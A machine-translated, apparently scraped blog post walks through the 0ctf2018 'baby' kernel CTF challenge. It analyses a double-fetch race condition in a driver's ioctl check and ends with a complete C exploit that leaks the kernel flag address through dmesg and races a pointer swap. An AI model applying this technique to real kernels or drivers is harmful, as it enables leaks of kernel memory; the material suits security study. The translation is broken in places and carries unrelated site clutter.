当前位置:网站首页>Kernel PWN learning (4) -- double fetch & 0ctf2018 baby
Kernel PWN learning (4) -- double fetch & 0ctf2018 baby
2022-04-23 09:28:00 【azraelxuemo】
List of articles
In fact, generally speaking, the problem is not complicated , It's a very simple conditional competition
subject
The attachment
The attachment
In fact, you only need to download .tar.gz
Attachment analysis
Don't be fooled by naming , It's just a tar
there core.cpio It's not compressed , So we just need to
Inside this exp,exp,c core.cpio, as well as fs.sh You can delete
fs.sh It's actually helping us generate cpio
analysis init
Here you can see that the driver is baby.ko, Corresponding open /dev/baby You can access , There's nothing else to say , Because it is not opened here dmesg_restrict, So we can execute dmesg see printk The content of
Pack another core.cpio
analysis start.sh
It's not turned on SMAP Protect , That is, the kernel state can directly access user state data
Here is the configuration of non single core single thread startup , Can trigger conditional competition , Under possible debugging , We add -s
Analysis driven
There are not many functions in this , The next three are useless , Mainly the top three
ioctl
I don't know what's going on here , I recognize that there is a problem ,v2 That's our third parameter
This is actually when we ioctl(fd,a2,a3) Call directly
sub_25(fd,a2,a3), So let's analyze sub_25
sub_25
Two functions
The first function is leaked flag Kernel address , What is promised here is %p, That is the flag Type the address saved inside , You can see that is aFlagThisWillbe The address of
It holds our last flag
This is the second function
chk_range_not_ok
This is actually
return shangxian<(addr+pianyi)
Let's see what the upper limit means
Here, let's have a look through debugging
Very simple test code
#include<sys/ioctl.h>
#include<fcntl.h>
#include <unistd.h>
int main(){
int fd=open("/dev/baby",2);
int a=2;
ioctl(fd, 0x1337, &a);
close(fd);
}
Here's a question , I hope a big man can answer
Generally, we find the loading address through this method , But this is obviously wrong
Through here I found the address
The modified init, because flag Hard coded in the driver , test flag I deleted it, too
rax Assignment bit current_task
rdx The value is as above , It looks like I'm familiar with , Yes, this is the highest address of the user state , So through debugging, we found that ,*(_QWORD *)(__readgsqword((unsigned int)¤t_task) + 4952)
It is the highest address of the user state
Then combine with the concrete if Content , To satisfy if
Instructions =0x1337
shangxian>= Incoming address +16
shangxian>=(Doward) Incoming address +*(int *) Incoming address +8
These two comparisons actually mean
What we pass in is actually the address of a structure
struct flag_object{
long flag_addr;
long length;
}
So the first one shangxian Comparison is to judge whether the address of the structure we pass in is user state
The second judgment is our flag Is it user mode
Because what is passed in here is a pointer , We can use conditions to compete , When he passed if after , We put the structure of flag_addr Change to kernel mode
The length should also match ,strlen barring \0, So it is 33
At the same time, it will be compared one by one flag It is not the same , The same will print , So we can only modify the pointer through conditional competition
attack
Let the cat out of the flag Address
because printk It will only be displayed in the debugging information , So we need to check after performing corresponding operations dmesg, Of course, that is dmesg_restrict=0, That is, ordinary users can also see , Then, oh, comparison plus assignment
Construct our flag Structure
Write changes flag Subfunction of
finish It's a sign , After we send enough requests in the main function, we set it to 1
exp
#include<sys/ioctl.h>
#include<fcntl.h>
#include <unistd.h>
#include<pthread.h>
#include<string.h>
#include<stdio.h>
#include<stdlib.h>
long flag_addr;
void get_kernel_flag_addr(int fd){
ioctl(fd,0x6666, 1);
system("dmesg|tail >/tmp/1.txt");
FILE *fd1=fopen("/tmp/1.txt","r");
char buf[120];
while(fgets(buf,120,fd1)){
if(strstr(buf,"Your flag is at")){
char hex[17];
strncpy(hex,buf+31,16);
sscanf(hex,"%lx",&flag_addr);
break;
}
}
fclose(fd1);
}
struct flag_structure{
long addr;
long len;
};
char fake_flag[]="fake";
int finish=0;
void chang_flag_addr(struct flag_structure *s){
while(finish==0){
s->addr=flag_addr;// Change to kernel flag Address , Callback function
}
}
int main(){
int fd=open("/dev/baby",2);
get_kernel_flag_addr(fd);
struct flag_structure flag;
flag.addr=(long)fake_flag;
flag.len=33;
pthread_t p1;
pthread_create(&p1, NULL,chang_flag_addr,&flag);//first parm is addr of pthread object,second set NULL,third is the callback_fun addr,fourth is the param
for(int i=0;i<10000;i++)
{
ioctl(fd, 0x1337, &flag);
flag.addr=(long )fake_flag;//we must modify addr to user space ,otherwith we can not pass if check
}
finish=1;
system("dmesg|grep flag{");
close(fd);
}
版权声明
本文为[azraelxuemo]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204230924486081.html
边栏推荐
- 小程序报错:Cannot read property 'currentTarget' of undefined
- Pre parsing of JS
- 108. Convert an ordered array into a binary search tree
- ASUS laptop can't read USB and surf the Internet after reinstalling the system
- 501. Mode in binary search tree
- Flutter 的加载动画这么玩更有趣
- LeetCode396. Rotate array
- Group Backpack
- Summary of wrong questions 1
- 数据清洗 ETL 工具Kettle的安装
猜你喜欢
501. 二叉搜索树中的众数
Node installation
Cross domain configuration error: when allowcredentials is true, allowedorigins cannot contain the special value "*“
Redis Desktop Manager for Mac
NPM reports an error: operation not allowed, MKDIR 'C: \ program files \ node JS \ node_ cache _ cacache’
Harbor enterprise image management system
[reading notes] Chapter 5 conditional statements, circular statements and block statements of Verilog digital system design tutorial (with answers to thinking questions)
DVWA range practice record
Kettle experiment
108. 将有序数组转换为二叉搜索树
随机推荐
Machine learning (VI) -- Bayesian classifier
Two methods of building Yum source warehouse locally
Acquisition of DOM learning elements JS
About CIN, scanf and getline, getchar, CIN Mixed use of getline
node安装
Cloud computing competition -- basic part of 2020 competition [task 3]
tsdf +mvs
Chapter VIII project stakeholder management of information system project manager summary
《数字电子技术基础》3.1 门电路概述、3.2 半导体二极管门电路
Distributed message oriented middleware framework selection - Digital Architecture Design (7)
Go language learning notes - exception handling | go language from scratch
ALV tree (ll LR RL RR) insert delete
SAP 101K 411K 库存变化
Leetcode题库78. 子集(递归 c实现)
Group Backpack
Emuelec compilation summary
成功的DevOps Leader 应该清楚的3个挑战
Project upload part
112. 路径总和
Two declaration methods of functions of JS